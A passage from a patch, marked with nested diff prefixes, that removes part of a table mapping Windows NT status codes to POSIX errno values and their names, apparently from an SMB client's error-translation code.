+-	{STATUS_NOTHING_TO_TERMINATE, -EIO, "STATUS_NOTHING_TO_TERMINATE"},
+-	{STATUS_PROCESS_NOT_IN_JOB, -EIO, "STATUS_PROCESS_NOT_IN_JOB"},
+-	{STATUS_PROCESS_IN_JOB, -EIO, "STATUS_PROCESS_IN_JOB"},
+-	{STATUS_VOLSNAP_HIBERNATE_READY, -EIO,
+-	"STATUS_VOLSNAP_HIBERNATE_READY"},
+-	{STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY, -EIO,
+-	"STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY"},
+-	{STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED, -EIO,
+-	"STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED"},
+-	{STATUS_INTERRUPT_STILL_CONNECTED, -EIO,
+-	"STATUS_INTERRUPT_STILL_CONNECTED"},
+-	{STATUS_PROCESS_CLONED, -EIO, "STATUS_PROCESS_CLONED"},
+-	{STATUS_FILE_LOCKED_WITH_ONLY_READERS, -EIO,
+-	"STATUS_FILE_LOCKED_WITH_ONLY_READERS"},
+-	{STATUS_FILE_LOCKED_WITH_WRITERS, -EIO,
+-	"STATUS_FILE_LOCKED_WITH_WRITERS"},
+-	{STATUS_RESOURCEMANAGER_READ_ONLY, -EROFS,
+-	"STATUS_RESOURCEMANAGER_READ_ONLY"},
+-	{STATUS_WAIT_FOR_OPLOCK, -EIO, "STATUS_WAIT_FOR_OPLOCK"},
+-	{DBG_EXCEPTION_HANDLED, -EIO, "DBG_EXCEPTION_HANDLED"},
+-	{DBG_CONTINUE, -EIO, "DBG_CONTINUE"},
+-	{STATUS_FLT_IO_COMPLETE, -EIO, "STATUS_FLT_IO_COMPLETE"},
+-	{STATUS_OBJECT_NAME_EXISTS, -EIO, "STATUS_OBJECT_NAME_EXISTS"},
+-	{STATUS_THREAD_WAS_SUSPENDED, -EIO, "STATUS_THREAD_WAS_SUSPENDED"},
+-	{STATUS_WORKING_SET_LIMIT_RANGE, -EIO,
+-	"STATUS_WORKING_SET_LIMIT_RANGE"},
+-	{STATUS_IMAGE_NOT_AT_BASE, -EIO, "STATUS_IMAGE_NOT_AT_BASE"},
+-	{STATUS_RXACT_STATE_CREATED, -EIO, "STATUS_RXACT_STATE_CREATED"},
+-	{STATUS_SEGMENT_NOTIFICATION, -EIO, "STATUS_SEGMENT_NOTIFICATION"},
+-	{STATUS_LOCAL_USER_SESSION_KEY, -EIO, "STATUS_LOCAL_USER_SESSION_KEY"},
+-	{STATUS_BAD_CURRENT_DIRECTORY, -EIO, "STATUS_BAD_CURRENT_DIRECTORY"},
+-	{STATUS_SERIAL_MORE_WRITES, -EIO, "STATUS_SERIAL_MORE_WRITES"},
+-	{STATUS_REGISTRY_RECOVERED, -EIO, "STATUS_REGISTRY_RECOVERED"},
+-	{STATUS_FT_READ_RECOVERY_FROM_BACKUP, -EIO,
+-	"STATUS_FT_READ_RECOVERY_FROM_BACKUP"},
+-	{STATUS_FT_WRITE_RECOVERY, -EIO, "STATUS_FT_WRITE_RECOVERY"},
+-	{STATUS_SERIAL_COUNTER_TIMEOUT, -ETIMEDOUT,
+-	"STATUS_SERIAL_COUNTER_TIMEOUT"},
+-	{STATUS_NULL_LM_PASSWORD, -EIO, "STATUS_NULL_LM_PASSWORD"},
+-	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH, -EIO,
+-	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH"},
+-	{STATUS_RECEIVE_PARTIAL, -EIO, "STATUS_RECEIVE_PARTIAL"},
+-	{STATUS_RECEIVE_EXPEDITED, -EIO, "STATUS_RECEIVE_EXPEDITED"},
+-	{STATUS_RECEIVE_PARTIAL_EXPEDITED, -EIO,
+-	"STATUS_RECEIVE_PARTIAL_EXPEDITED"},
+-	{STATUS_EVENT_DONE, -EIO, "STATUS_EVENT_DONE"},
+-	{STATUS_EVENT_PENDING, -EIO, "STATUS_EVENT_PENDING"},
+-	{STATUS_CHECKING_FILE_SYSTEM, -EIO, "STATUS_CHECKING_FILE_SYSTEM"},
+-	{STATUS_FATAL_APP_EXIT, -EIO, "STATUS_FATAL_APP_EXIT"},
+-	{STATUS_PREDEFINED_HANDLE, -EIO, "STATUS_PREDEFINED_HANDLE"},
+-	{STATUS_WAS_UNLOCKED, -EIO, "STATUS_WAS_UNLOCKED"},
+-	{STATUS_SERVICE_NOTIFICATION, -EIO, "STATUS_SERVICE_NOTIFICATION"},
+-	{STATUS_WAS_LOCKED, -EIO, "STATUS_WAS_LOCKED"},
+-	{STATUS_LOG_HARD_ERROR, -EIO, "STATUS_LOG_HARD_ERROR"},
+-	{STATUS_ALREADY_WIN32, -EIO, "STATUS_ALREADY_WIN32"},
+-	{STATUS_WX86_UNSIMULATE, -EIO, "STATUS_WX86_UNSIMULATE"},
+-	{STATUS_WX86_CONTINUE, -EIO, "STATUS_WX86_CONTINUE"},
+-	{STATUS_WX86_SINGLE_STEP, -EIO, "STATUS_WX86_SINGLE_STEP"},
+-	{STATUS_WX86_BREAKPOINT, -EIO, "STATUS_WX86_BREAKPOINT"},
+-	{STATUS_WX86_EXCEPTION_CONTINUE, -EIO,
+-	"STATUS_WX86_EXCEPTION_CONTINUE"},
+-	{STATUS_WX86_EXCEPTION_LASTCHANCE, -EIO,
+-	"STATUS_WX86_EXCEPTION_LASTCHANCE"},
+-	{STATUS_WX86_EXCEPTION_CHAIN, -EIO, "STATUS_WX86_EXCEPTION_CHAIN"},
+-	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE, -EIO,
+-	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE"},
+-	{STATUS_NO_YIELD_PERFORMED, -EIO, "STATUS_NO_YIELD_PERFORMED"},
+-	{STATUS_TIMER_RESUME_IGNORED, -EIO, "STATUS_TIMER_RESUME_IGNORED"},
+-	{STATUS_ARBITRATION_UNHANDLED, -EIO, "STATUS_ARBITRATION_UNHANDLED"},
+-	{STATUS_CARDBUS_NOT_SUPPORTED, -ENOSYS, "STATUS_CARDBUS_NOT_SUPPORTED"},
+-	{STATUS_WX86_CREATEWX86TIB, -EIO, "STATUS_WX86_CREATEWX86TIB"},
+-	{STATUS_MP_PROCESSOR_MISMATCH, -EIO, "STATUS_MP_PROCESSOR_MISMATCH"},
+-	{STATUS_HIBERNATED, -EIO, "STATUS_HIBERNATED"},
+-	{STATUS_RESUME_HIBERNATION, -EIO, "STATUS_RESUME_HIBERNATION"},
+-	{STATUS_FIRMWARE_UPDATED, -EIO, "STATUS_FIRMWARE_UPDATED"},
+-	{STATUS_DRIVERS_LEAKING_LOCKED_PAGES, -EIO,
+-	"STATUS_DRIVERS_LEAKING_LOCKED_PAGES"},
+-	{STATUS_MESSAGE_RETRIEVED, -EIO, "STATUS_MESSAGE_RETRIEVED"},
+-	{STATUS_SYSTEM_POWERSTATE_TRANSITION, -EIO,
+-	"STATUS_SYSTEM_POWERSTATE_TRANSITION"},
+-	{STATUS_ALPC_CHECK_COMPLETION_LIST, -EIO,
+-	"STATUS_ALPC_CHECK_COMPLETION_LIST"},
+-	{STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION, -EIO,
+-	"STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION"},
+-	{STATUS_ACCESS_AUDIT_BY_POLICY, -EIO, "STATUS_ACCESS_AUDIT_BY_POLICY"},
+-	{STATUS_ABANDON_HIBERFILE, -EIO, "STATUS_ABANDON_HIBERFILE"},
+-	{STATUS_BIZRULES_NOT_ENABLED, -EIO, "STATUS_BIZRULES_NOT_ENABLED"},
+-	{STATUS_WAKE_SYSTEM, -EIO, "STATUS_WAKE_SYSTEM"},
+-	{STATUS_DS_SHUTTING_DOWN, -EIO, "STATUS_DS_SHUTTING_DOWN"},
+-	{DBG_REPLY_LATER, -EIO, "DBG_REPLY_LATER"},
+-	{DBG_UNABLE_TO_PROVIDE_HANDLE, -EIO, "DBG_UNABLE_TO_PROVIDE_HANDLE"},
+-	{DBG_TERMINATE_THREAD, -EIO, "DBG_TERMINATE_THREAD"},
+-	{DBG_TERMINATE_PROCESS, -EIO, "DBG_TERMINATE_PROCESS"},
+-	{DBG_CONTROL_C, -EIO, "DBG_CONTROL_C"},
+-	{DBG_PRINTEXCEPTION_C, -EIO, "DBG_PRINTEXCEPTION_C"},
+-	{DBG_RIPEXCEPTION, -EIO, "DBG_RIPEXCEPTION"},
+-	{DBG_CONTROL_BREAK, -EIO, "DBG_CONTROL_BREAK"},
+-	{DBG_COMMAND_EXCEPTION, -EIO, "DBG_COMMAND_EXCEPTION"},
+-	{RPC_NT_UUID_LOCAL_ONLY, -EIO, "RPC_NT_UUID_LOCAL_ONLY"},
+-	{RPC_NT_SEND_INCOMPLETE, -EIO, "RPC_NT_SEND_INCOMPLETE"},
+-	{STATUS_CTX_CDM_CONNECT, -EIO, "STATUS_CTX_CDM_CONNECT"},
+-	{STATUS_CTX_CDM_DISCONNECT, -EIO, "STATUS_CTX_CDM_DISCONNECT"},
+-	{STATUS_SXS_RELEASE_ACTIVATION_CONTEXT, -EIO,
+-	"STATUS_SXS_RELEASE_ACTIVATION_CONTEXT"},
+-	{STATUS_RECOVERY_NOT_NEEDED, -EIO, "STATUS_RECOVERY_NOT_NEEDED"},
+-	{STATUS_RM_ALREADY_STARTED, -EIO, "STATUS_RM_ALREADY_STARTED"},
+-	{STATUS_LOG_NO_RESTART, -EIO, "STATUS_LOG_NO_RESTART"},
+-	{STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST, -EIO,
+-	"STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST"},
+-	{STATUS_GRAPHICS_PARTIAL_DATA_POPULATED, -EIO,
+-	"STATUS_GRAPHICS_PARTIAL_DATA_POPULATED"},
+-	{STATUS_GRAPHICS_DRIVER_MISMATCH, -EIO,
+-	"STATUS_GRAPHICS_DRIVER_MISMATCH"},
+-	{STATUS_GRAPHICS_MODE_NOT_PINNED, -EIO,
+-	"STATUS_GRAPHICS_MODE_NOT_PINNED"},
+-	{STATUS_GRAPHICS_NO_PREFERRED_MODE, -EIO,
+-	"STATUS_GRAPHICS_NO_PREFERRED_MODE"},
+-	{STATUS_GRAPHICS_DATASET_IS_EMPTY, -EIO,
+-	"STATUS_GRAPHICS_DATASET_IS_EMPTY"},
+-	{STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET, -EIO,
+-	"STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET"},
+-	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED, -EIO,
+-	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED"},
+-	{STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS, -EIO,
+-	"STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS"},
+-	{STATUS_GRAPHICS_LEADLINK_START_DEFERRED, -EIO,
+-	"STATUS_GRAPHICS_LEADLINK_START_DEFERRED"},
+-	{STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY, -EIO,
+-	"STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY"},
+-	{STATUS_GRAPHICS_START_DEFERRED, -EIO,
+-	"STATUS_GRAPHICS_START_DEFERRED"},
+-	{STATUS_NDIS_INDICATION_REQUIRED, -EIO,
+-	"STATUS_NDIS_INDICATION_REQUIRED"},
+-	{STATUS_GUARD_PAGE_VIOLATION, -EIO, "STATUS_GUARD_PAGE_VIOLATION"},
+-	{STATUS_DATATYPE_MISALIGNMENT, -EIO, "STATUS_DATATYPE_MISALIGNMENT"},
+-	{STATUS_BREAKPOINT, -EIO, "STATUS_BREAKPOINT"},
+-	{STATUS_SINGLE_STEP, -EIO, "STATUS_SINGLE_STEP"},
+-	{STATUS_BUFFER_OVERFLOW, -E2BIG, "STATUS_BUFFER_OVERFLOW"},
+-	{STATUS_NO_MORE_FILES, -ENODATA, "STATUS_NO_MORE_FILES"},
+-	{STATUS_WAKE_SYSTEM_DEBUGGER, -EIO, "STATUS_WAKE_SYSTEM_DEBUGGER"},
+-	{STATUS_HANDLES_CLOSED, -EIO, "STATUS_HANDLES_CLOSED"},
+-	{STATUS_NO_INHERITANCE, -EIO, "STATUS_NO_INHERITANCE"},
+-	{STATUS_GUID_SUBSTITUTION_MADE, -EIO, "STATUS_GUID_SUBSTITUTION_MADE"},
+-	{STATUS_PARTIAL_COPY, -EIO, "STATUS_PARTIAL_COPY"},
+-	{STATUS_DEVICE_PAPER_EMPTY, -EIO, "STATUS_DEVICE_PAPER_EMPTY"},
+-	{STATUS_DEVICE_POWERED_OFF, -EIO, "STATUS_DEVICE_POWERED_OFF"},
+-	{STATUS_DEVICE_OFF_LINE, -EIO, "STATUS_DEVICE_OFF_LINE"},
+-	{STATUS_DEVICE_BUSY, -EBUSY, "STATUS_DEVICE_BUSY"},
+-	{STATUS_NO_MORE_EAS, -EIO, "STATUS_NO_MORE_EAS"},
+-	{STATUS_INVALID_EA_NAME, -EINVAL, "STATUS_INVALID_EA_NAME"},
+-	{STATUS_EA_LIST_INCONSISTENT, -EIO, "STATUS_EA_LIST_INCONSISTENT"},
+-	{STATUS_INVALID_EA_FLAG, -EINVAL, "STATUS_INVALID_EA_FLAG"},
+-	{STATUS_VERIFY_REQUIRED, -EIO, "STATUS_VERIFY_REQUIRED"},
+-	{STATUS_EXTRANEOUS_INFORMATION, -EIO, "STATUS_EXTRANEOUS_INFORMATION"},
+-	{STATUS_RXACT_COMMIT_NECESSARY, -EIO, "STATUS_RXACT_COMMIT_NECESSARY"},
+-	{STATUS_NO_MORE_ENTRIES, -EIO, "STATUS_NO_MORE_ENTRIES"},
+-	{STATUS_FILEMARK_DETECTED, -EIO, "STATUS_FILEMARK_DETECTED"},
+-	{STATUS_MEDIA_CHANGED, -EIO, "STATUS_MEDIA_CHANGED"},
+-	{STATUS_BUS_RESET, -EIO, "STATUS_BUS_RESET"},
+-	{STATUS_END_OF_MEDIA, -EIO, "STATUS_END_OF_MEDIA"},
+-	{STATUS_BEGINNING_OF_MEDIA, -EIO, "STATUS_BEGINNING_OF_MEDIA"},
+-	{STATUS_MEDIA_CHECK, -EIO, "STATUS_MEDIA_CHECK"},
+-	{STATUS_SETMARK_DETECTED, -EIO, "STATUS_SETMARK_DETECTED"},
+-	{STATUS_NO_DATA_DETECTED, -EIO, "STATUS_NO_DATA_DETECTED"},
+-	{STATUS_REDIRECTOR_HAS_OPEN_HANDLES, -EIO,
+-	"STATUS_REDIRECTOR_HAS_OPEN_HANDLES"},
+-	{STATUS_SERVER_HAS_OPEN_HANDLES, -EIO,
+-	"STATUS_SERVER_HAS_OPEN_HANDLES"},
+-	{STATUS_ALREADY_DISCONNECTED, -EIO, "STATUS_ALREADY_DISCONNECTED"},
+-	{STATUS_LONGJUMP, -EIO, "STATUS_LONGJUMP"},
+-	{STATUS_CLEANER_CARTRIDGE_INSTALLED, -EIO,
+-	"STATUS_CLEANER_CARTRIDGE_INSTALLED"},
+-	{STATUS_PLUGPLAY_QUERY_VETOED, -EIO, "STATUS_PLUGPLAY_QUERY_VETOED"},
+-	{STATUS_UNWIND_CONSOLIDATE, -EIO, "STATUS_UNWIND_CONSOLIDATE"},
+-	{STATUS_REGISTRY_HIVE_RECOVERED, -EIO,
+-	"STATUS_REGISTRY_HIVE_RECOVERED"},
+-	{STATUS_DLL_MIGHT_BE_INSECURE, -EIO, "STATUS_DLL_MIGHT_BE_INSECURE"},
+-	{STATUS_DLL_MIGHT_BE_INCOMPATIBLE, -EIO,
+-	"STATUS_DLL_MIGHT_BE_INCOMPATIBLE"},
+-	{STATUS_STOPPED_ON_SYMLINK, -EOPNOTSUPP, "STATUS_STOPPED_ON_SYMLINK"},
+-	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EOPNOTSUPP,
+-	"STATUS_REPARSE_NOT_HANDLED"},
+-	{STATUS_DEVICE_REQUIRES_CLEANING, -EIO,
+-	"STATUS_DEVICE_REQUIRES_CLEANING"},
+-	{STATUS_DEVICE_DOOR_OPEN, -EIO, "STATUS_DEVICE_DOOR_OPEN"},
+-	{STATUS_DATA_LOST_REPAIR, -EIO, "STATUS_DATA_LOST_REPAIR"},
+-	{DBG_EXCEPTION_NOT_HANDLED, -EIO, "DBG_EXCEPTION_NOT_HANDLED"},
+-	{STATUS_CLUSTER_NODE_ALREADY_UP, -EIO,
+-	"STATUS_CLUSTER_NODE_ALREADY_UP"},
+-	{STATUS_CLUSTER_NODE_ALREADY_DOWN, -EIO,
+-	"STATUS_CLUSTER_NODE_ALREADY_DOWN"},
+-	{STATUS_CLUSTER_NETWORK_ALREADY_ONLINE, -EIO,
+-	"STATUS_CLUSTER_NETWORK_ALREADY_ONLINE"},
+-	{STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE, -EIO,
+-	"STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE"},
+-	{STATUS_CLUSTER_NODE_ALREADY_MEMBER, -EIO,
+-	"STATUS_CLUSTER_NODE_ALREADY_MEMBER"},
+-	{STATUS_COULD_NOT_RESIZE_LOG, -EIO, "STATUS_COULD_NOT_RESIZE_LOG"},
+-	{STATUS_NO_TXF_METADATA, -EIO, "STATUS_NO_TXF_METADATA"},
+-	{STATUS_CANT_RECOVER_WITH_HANDLE_OPEN, -EIO,
+-	"STATUS_CANT_RECOVER_WITH_HANDLE_OPEN"},
+-	{STATUS_TXF_METADATA_ALREADY_PRESENT, -EIO,
+-	"STATUS_TXF_METADATA_ALREADY_PRESENT"},
+-	{STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET, -EIO,
+-	"STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET"},
+-	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED, -EIO,
+-	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED"},
+-	{STATUS_FLT_BUFFER_TOO_SMALL, -ENOBUFS, "STATUS_FLT_BUFFER_TOO_SMALL"},
+-	{STATUS_FVE_PARTIAL_METADATA, -EIO, "STATUS_FVE_PARTIAL_METADATA"},
+-	{STATUS_UNSUCCESSFUL, -EIO, "STATUS_UNSUCCESSFUL"},
+-	{STATUS_NOT_IMPLEMENTED, -EOPNOTSUPP, "STATUS_NOT_IMPLEMENTED"},
+-	{STATUS_INVALID_INFO_CLASS, -EIO, "STATUS_INVALID_INFO_CLASS"},
+-	{STATUS_INFO_LENGTH_MISMATCH, -EIO, "STATUS_INFO_LENGTH_MISMATCH"},
+-	{STATUS_ACCESS_VIOLATION, -EACCES, "STATUS_ACCESS_VIOLATION"},
+-	{STATUS_IN_PAGE_ERROR, -EFAULT, "STATUS_IN_PAGE_ERROR"},
+-	{STATUS_PAGEFILE_QUOTA, -EDQUOT, "STATUS_PAGEFILE_QUOTA"},
+-	{STATUS_INVALID_HANDLE, -EBADF, "STATUS_INVALID_HANDLE"},
+-	{STATUS_BAD_INITIAL_STACK, -EIO, "STATUS_BAD_INITIAL_STACK"},
+-	{STATUS_BAD_INITIAL_PC, -EIO, "STATUS_BAD_INITIAL_PC"},
+-	{STATUS_INVALID_CID, -EIO, "STATUS_INVALID_CID"},
+-	{STATUS_TIMER_NOT_CANCELED, -EIO, "STATUS_TIMER_NOT_CANCELED"},
+-	{STATUS_INVALID_PARAMETER, -EINVAL, "STATUS_INVALID_PARAMETER"},
+-	{STATUS_NO_SUCH_DEVICE, -ENODEV, "STATUS_NO_SUCH_DEVICE"},
+-	{STATUS_NO_SUCH_FILE, -ENOENT, "STATUS_NO_SUCH_FILE"},
+-	{STATUS_INVALID_DEVICE_REQUEST, -EOPNOTSUPP, "STATUS_INVALID_DEVICE_REQUEST"},
+-	{STATUS_END_OF_FILE, -ENODATA, "STATUS_END_OF_FILE"},
+-	{STATUS_WRONG_VOLUME, -EIO, "STATUS_WRONG_VOLUME"},
+-	{STATUS_NO_MEDIA_IN_DEVICE, -EIO, "STATUS_NO_MEDIA_IN_DEVICE"},
+-	{STATUS_UNRECOGNIZED_MEDIA, -EIO, "STATUS_UNRECOGNIZED_MEDIA"},
+-	{STATUS_NONEXISTENT_SECTOR, -EIO, "STATUS_NONEXISTENT_SECTOR"},
+-	{STATUS_MORE_PROCESSING_REQUIRED, -EIO,
+-	"STATUS_MORE_PROCESSING_REQUIRED"},
+-	{STATUS_NO_MEMORY, -EREMOTEIO, "STATUS_NO_MEMORY"},
+-	{STATUS_CONFLICTING_ADDRESSES, -EADDRINUSE,
+-	"STATUS_CONFLICTING_ADDRESSES"},
+-	{STATUS_NOT_MAPPED_VIEW, -EIO, "STATUS_NOT_MAPPED_VIEW"},
+-	{STATUS_UNABLE_TO_FREE_VM, -EIO, "STATUS_UNABLE_TO_FREE_VM"},
+-	{STATUS_UNABLE_TO_DELETE_SECTION, -EIO,
+-	"STATUS_UNABLE_TO_DELETE_SECTION"},
+-	{STATUS_INVALID_SYSTEM_SERVICE, -EIO, "STATUS_INVALID_SYSTEM_SERVICE"},
+-	{STATUS_ILLEGAL_INSTRUCTION, -EIO, "STATUS_ILLEGAL_INSTRUCTION"},
+-	{STATUS_INVALID_LOCK_SEQUENCE, -EIO, "STATUS_INVALID_LOCK_SEQUENCE"},
+-	{STATUS_INVALID_VIEW_SIZE, -EIO, "STATUS_INVALID_VIEW_SIZE"},
+-	{STATUS_INVALID_FILE_FOR_SECTION, -EIO,
+-	"STATUS_INVALID_FILE_FOR_SECTION"},
+-	{STATUS_ALREADY_COMMITTED, -EIO, "STATUS_ALREADY_COMMITTED"},
+-	{STATUS_ACCESS_DENIED, -EACCES, "STATUS_ACCESS_DENIED"},
+-	{STATUS_BUFFER_TOO_SMALL, -EIO, "STATUS_BUFFER_TOO_SMALL"},
+-	{STATUS_OBJECT_TYPE_MISMATCH, -EIO, "STATUS_OBJECT_TYPE_MISMATCH"},
+-	{STATUS_NONCONTINUABLE_EXCEPTION, -EIO,
+-	"STATUS_NONCONTINUABLE_EXCEPTION"},
+-	{STATUS_INVALID_DISPOSITION, -EIO, "STATUS_INVALID_DISPOSITION"},
+-	{STATUS_UNWIND, -EIO, "STATUS_UNWIND"},
+-	{STATUS_BAD_STACK, -EIO, "STATUS_BAD_STACK"},
+-	{STATUS_INVALID_UNWIND_TARGET, -EIO, "STATUS_INVALID_UNWIND_TARGET"},
+-	{STATUS_NOT_LOCKED, -EIO, "STATUS_NOT_LOCKED"},
+-	{STATUS_PARITY_ERROR, -EIO, "STATUS_PARITY_ERROR"},
+-	{STATUS_UNABLE_TO_DECOMMIT_VM, -EIO, "STATUS_UNABLE_TO_DECOMMIT_VM"},
+-	{STATUS_NOT_COMMITTED, -EIO, "STATUS_NOT_COMMITTED"},
+-	{STATUS_INVALID_PORT_ATTRIBUTES, -EIO,
+-	"STATUS_INVALID_PORT_ATTRIBUTES"},
+-	{STATUS_PORT_MESSAGE_TOO_LONG, -EIO, "STATUS_PORT_MESSAGE_TOO_LONG"},
+-	{STATUS_INVALID_PARAMETER_MIX, -EINVAL, "STATUS_INVALID_PARAMETER_MIX"},
+-	{STATUS_INVALID_QUOTA_LOWER, -EIO, "STATUS_INVALID_QUOTA_LOWER"},
+-	{STATUS_DISK_CORRUPT_ERROR, -EIO, "STATUS_DISK_CORRUPT_ERROR"},
+-	{STATUS_OBJECT_NAME_INVALID, -ENOENT, "STATUS_OBJECT_NAME_INVALID"},
+-	{STATUS_OBJECT_NAME_NOT_FOUND, -ENOENT, "STATUS_OBJECT_NAME_NOT_FOUND"},
+-	{STATUS_OBJECT_NAME_COLLISION, -EEXIST, "STATUS_OBJECT_NAME_COLLISION"},
+-	{STATUS_PORT_DISCONNECTED, -EIO, "STATUS_PORT_DISCONNECTED"},
+-	{STATUS_DEVICE_ALREADY_ATTACHED, -EIO,
+-	"STATUS_DEVICE_ALREADY_ATTACHED"},
+-	{STATUS_OBJECT_PATH_INVALID, -ENOTDIR, "STATUS_OBJECT_PATH_INVALID"},
+-	{STATUS_OBJECT_PATH_NOT_FOUND, -ENOENT, "STATUS_OBJECT_PATH_NOT_FOUND"},
+-	{STATUS_OBJECT_PATH_SYNTAX_BAD, -EIO, "STATUS_OBJECT_PATH_SYNTAX_BAD"},
+-	{STATUS_DATA_OVERRUN, -EIO, "STATUS_DATA_OVERRUN"},
+-	{STATUS_DATA_LATE_ERROR, -EIO, "STATUS_DATA_LATE_ERROR"},
+-	{STATUS_DATA_ERROR, -EIO, "STATUS_DATA_ERROR"},
+-	{STATUS_CRC_ERROR, -EIO, "STATUS_CRC_ERROR"},
+-	{STATUS_SECTION_TOO_BIG, -EIO, "STATUS_SECTION_TOO_BIG"},
+-	{STATUS_PORT_CONNECTION_REFUSED, -ECONNREFUSED,
+-	"STATUS_PORT_CONNECTION_REFUSED"},
+-	{STATUS_INVALID_PORT_HANDLE, -EIO, "STATUS_INVALID_PORT_HANDLE"},
+-	{STATUS_SHARING_VIOLATION, -EBUSY, "STATUS_SHARING_VIOLATION"},
+-	{STATUS_QUOTA_EXCEEDED, -EDQUOT, "STATUS_QUOTA_EXCEEDED"},
+-	{STATUS_INVALID_PAGE_PROTECTION, -EIO,
+-	"STATUS_INVALID_PAGE_PROTECTION"},
+-	{STATUS_MUTANT_NOT_OWNED, -EIO, "STATUS_MUTANT_NOT_OWNED"},
+-	{STATUS_SEMAPHORE_LIMIT_EXCEEDED, -EIO,
+-	"STATUS_SEMAPHORE_LIMIT_EXCEEDED"},
+-	{STATUS_PORT_ALREADY_SET, -EIO, "STATUS_PORT_ALREADY_SET"},
+-	{STATUS_SECTION_NOT_IMAGE, -EIO, "STATUS_SECTION_NOT_IMAGE"},
+-	{STATUS_SUSPEND_COUNT_EXCEEDED, -EIO, "STATUS_SUSPEND_COUNT_EXCEEDED"},
+-	{STATUS_THREAD_IS_TERMINATING, -EIO, "STATUS_THREAD_IS_TERMINATING"},
+-	{STATUS_BAD_WORKING_SET_LIMIT, -EIO, "STATUS_BAD_WORKING_SET_LIMIT"},
+-	{STATUS_INCOMPATIBLE_FILE_MAP, -EIO, "STATUS_INCOMPATIBLE_FILE_MAP"},
+-	{STATUS_SECTION_PROTECTION, -EIO, "STATUS_SECTION_PROTECTION"},
+-	{STATUS_EAS_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_EAS_NOT_SUPPORTED"},
+-	{STATUS_EA_TOO_LARGE, -EIO, "STATUS_EA_TOO_LARGE"},
+-	{STATUS_NONEXISTENT_EA_ENTRY, -EIO, "STATUS_NONEXISTENT_EA_ENTRY"},
+-	{STATUS_NO_EAS_ON_FILE, -ENODATA, "STATUS_NO_EAS_ON_FILE"},
+-	{STATUS_EA_CORRUPT_ERROR, -EIO, "STATUS_EA_CORRUPT_ERROR"},
+-	{STATUS_FILE_LOCK_CONFLICT, -EACCES, "STATUS_FILE_LOCK_CONFLICT"},
+-	{STATUS_LOCK_NOT_GRANTED, -EACCES, "STATUS_LOCK_NOT_GRANTED"},
+-	{STATUS_DELETE_PENDING, -ENOENT, "STATUS_DELETE_PENDING"},
+-	{STATUS_CTL_FILE_NOT_SUPPORTED, -ENOSYS,
+-	"STATUS_CTL_FILE_NOT_SUPPORTED"},
+-	{STATUS_UNKNOWN_REVISION, -EIO, "STATUS_UNKNOWN_REVISION"},
+-	{STATUS_REVISION_MISMATCH, -EIO, "STATUS_REVISION_MISMATCH"},
+-	{STATUS_INVALID_OWNER, -EIO, "STATUS_INVALID_OWNER"},
+-	{STATUS_INVALID_PRIMARY_GROUP, -EIO, "STATUS_INVALID_PRIMARY_GROUP"},
+-	{STATUS_NO_IMPERSONATION_TOKEN, -EIO, "STATUS_NO_IMPERSONATION_TOKEN"},
+-	{STATUS_CANT_DISABLE_MANDATORY, -EIO, "STATUS_CANT_DISABLE_MANDATORY"},
+-	{STATUS_NO_LOGON_SERVERS, -EIO, "STATUS_NO_LOGON_SERVERS"},
+-	{STATUS_NO_SUCH_LOGON_SESSION, -EIO, "STATUS_NO_SUCH_LOGON_SESSION"},
+-	{STATUS_NO_SUCH_PRIVILEGE, -EIO, "STATUS_NO_SUCH_PRIVILEGE"},
+-	{STATUS_PRIVILEGE_NOT_HELD, -EIO, "STATUS_PRIVILEGE_NOT_HELD"},
+-	{STATUS_INVALID_ACCOUNT_NAME, -EIO, "STATUS_INVALID_ACCOUNT_NAME"},
+-	{STATUS_USER_EXISTS, -EIO, "STATUS_USER_EXISTS"},
+-	{STATUS_NO_SUCH_USER, -EIO, "STATUS_NO_SUCH_USER"},
+-	{STATUS_GROUP_EXISTS, -EIO, "STATUS_GROUP_EXISTS"},
+-	{STATUS_NO_SUCH_GROUP, -EIO, "STATUS_NO_SUCH_GROUP"},
+-	{STATUS_MEMBER_IN_GROUP, -EIO, "STATUS_MEMBER_IN_GROUP"},
+-	{STATUS_MEMBER_NOT_IN_GROUP, -EIO, "STATUS_MEMBER_NOT_IN_GROUP"},
+-	{STATUS_LAST_ADMIN, -EIO, "STATUS_LAST_ADMIN"},
+-	{STATUS_WRONG_PASSWORD, -EACCES, "STATUS_WRONG_PASSWORD"},
+-	{STATUS_ILL_FORMED_PASSWORD, -EINVAL, "STATUS_ILL_FORMED_PASSWORD"},
+-	{STATUS_PASSWORD_RESTRICTION, -EACCES, "STATUS_PASSWORD_RESTRICTION"},
+-	{STATUS_LOGON_FAILURE, -EACCES, "STATUS_LOGON_FAILURE"},
+-	{STATUS_ACCOUNT_RESTRICTION, -EACCES, "STATUS_ACCOUNT_RESTRICTION"},
+-	{STATUS_INVALID_LOGON_HOURS, -EACCES, "STATUS_INVALID_LOGON_HOURS"},
